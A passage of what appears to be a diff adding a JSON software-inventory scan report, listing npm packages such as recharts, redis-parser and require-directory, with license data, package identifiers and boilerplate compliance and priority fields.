"mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9230ea38673dd70b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: readdirp 3.6.0", + "title": "readdirp 3.6.0", + "description": "Package discovered: readdirp 3.6.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "beb5f9a5d33de00e", + "name": "readdirp", + "version": "3.6.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:readdirp:readdirp:3.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/readdirp@3.6.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", + "integrity": "sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==", + "dependencies": { + "picomatch": "^2.2.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ec316d1c56cfd200", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: recharts 2.15.4", + "title": "recharts 2.15.4", + "description": "Package discovered: recharts 2.15.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "98e64f0b2bbef0ce", + "name": "recharts", + "version": "2.15.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:recharts:recharts:2.15.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/recharts@2.15.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/recharts/-/recharts-2.15.4.tgz", + "integrity": "sha512-UT/q6fwS3c1dHbXv2uFgYJ9BMFHu3fwnd7AYZaEQhXuYQ4hgsxLvsUXzGdKeZrW5xopzDCvuA2N41WJ88I7zIw==", + "dependencies": { + "clsx": "^2.0.0", + "eventemitter3": "^4.0.1", + "lodash": "^4.17.21", + "react-is": "^18.3.1", + "react-smooth": "^4.0.4", + "recharts-scale": "^0.4.4", + "tiny-invariant": "^1.3.1", + "victory-vendor": "^36.6.8" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "249969671e277623", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: recharts-scale 0.4.5", + "title": "recharts-scale 0.4.5", + "description": "Package discovered: recharts-scale 0.4.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b982e93a08325fbd", + "name": "recharts-scale", + "version": "0.4.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:recharts-scale:recharts-scale:0.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:recharts-scale:recharts_scale:0.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:recharts_scale:recharts-scale:0.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:recharts_scale:recharts_scale:0.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:recharts:recharts-scale:0.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:recharts:recharts_scale:0.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/recharts-scale@0.4.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/recharts-scale/-/recharts-scale-0.4.5.tgz", + "integrity": "sha512-kivNFO+0OcUNu7jQquLXAxz1FIwZj8nrj+YkOKc5694NbjCvcT6aSZiIzNzd2Kul4o4rTto8QVR9lMNtxD4G1w==", + "dependencies": { + "decimal.js-light": "^2.4.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0c07927a54487fe7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: redis-errors 1.2.0", + "title": "redis-errors 1.2.0", + "description": "Package discovered: redis-errors 1.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c6c6f81fb8ed6f43", + "name": "redis-errors", + "version": "1.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:redis-errors:redis-errors:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:redis-errors:redis_errors:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:redis_errors:redis-errors:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:redis_errors:redis_errors:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:redis:redis-errors:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:redis:redis_errors:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/redis-errors@1.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/redis-errors/-/redis-errors-1.2.0.tgz", + "integrity": "sha512-1qny3OExCf0UvUV/5wpYKf2YwPcOqXzkwKKSmKHiE6ZMQs5heeE/c8eXK+PNllPvmjgAbfnsbpkGZWy8cBpn9w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "38d5b601f3f165a4", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: redis-parser 3.0.0", + "title": "redis-parser 3.0.0", + "description": "Package discovered: redis-parser 3.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d5b8e01dbe4fdde4", + "name": "redis-parser", + "version": "3.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:redis-parser:redis-parser:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:redis-parser:redis_parser:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:redis_parser:redis-parser:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:redis_parser:redis_parser:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:redis:redis-parser:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:redis:redis_parser:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/redis-parser@3.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/redis-parser/-/redis-parser-3.0.0.tgz", + "integrity": "sha512-DJnGAeenTdpMEH6uAJRK/uiyEIH9WVsUmoLwzudwGJUwZPp80PDBWPHXSAGNPwNvIXAbe7MSUB1zQFugFml66A==", + "dependencies": { + "redis-errors": "^1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "73e41b20b413651d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: rentaldrivego 1.0.0", + "title": "rentaldrivego 1.0.0", + "description": "Package discovered: rentaldrivego 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "784a87ea0f6f2516", + "name": "rentaldrivego", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:rentaldrivego:rentaldrivego:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/rentaldrivego@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "", + "integrity": "", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7ebb1ff31601df05", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: require-directory 2.1.1", + "title": "require-directory 2.1.1", + "description": "Package discovered: require-directory 2.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ae03eb850b2a6844", + "name": "require-directory", + "version": "2.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:require-directory:require-directory:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require-directory:require_directory:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require_directory:require-directory:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require_directory:require_directory:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require:require-directory:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require:require_directory:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/require-directory@2.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", + "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ae7e8898d2f0d0c8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: require-from-string 2.0.2", + "title": "require-from-string 2.0.2", + "description": "Package discovered: require-from-string 2.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f7f7aa302949d36c", + "name": "require-from-string", + "version": "2.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:require-from-string:require-from-string:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require-from-string:require_from_string:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require_from_string:require-from-string:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require_from_string:require_from_string:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require-from:require-from-string:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require-from:require_from_string:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require_from:require-from-string:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require_from:require_from_string:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require:require-from-string:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:require:require_from_string:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/require-from-string@2.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", + "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2d09a802d546535f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: require-main-filename 2.0.0", + "title": "require-main-filename 2.0.0", + "description": "Package discovered: require-main-filename 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "791f53dc42a97604", + "name": "require-main-filename", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": 